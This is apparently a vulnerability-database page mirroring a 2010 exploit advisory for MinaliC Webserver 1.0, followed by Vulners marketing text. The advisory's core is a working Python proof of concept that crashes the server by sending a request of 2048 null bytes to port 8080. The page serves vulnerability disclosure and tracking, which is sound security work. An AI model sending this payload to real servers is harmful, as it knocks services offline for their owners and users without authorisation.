Lucene search
K

MinaliC Webserver v1.0 Denial of Service Vulnerability

🗓️ 28 Oct 2010 00:00:00Reported by John LeitchType 
zdt
 zdt
🔗 0day.today👁 13 Views

MinaliC Webserver v1.0 Denial of Service Vulnerability, causes server to crash with 2048+ bytes reques

Code
======================================================
MinaliC Webserver v1.0 Denial of Service Vulnerability
======================================================

# ------------------------------------------------------------------------
# Software................MinaliC Webserver 1.0
# Vulnerability...........Denial Of Service
# Download................http://sourceforge.net/projects/minalic/
# Release Date............10/24/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# [email protected]
# ------------------------------------------------------------------------
#
# --Description--
#
# Sending a request with a length greater than or equal to 2048 bytes
# causes the server to crash.
#
#
# --PoC--
 
import socket
 
host = 'localhost'
port = 8080
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('\x00'*2048)



#  0day.today [2018-04-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation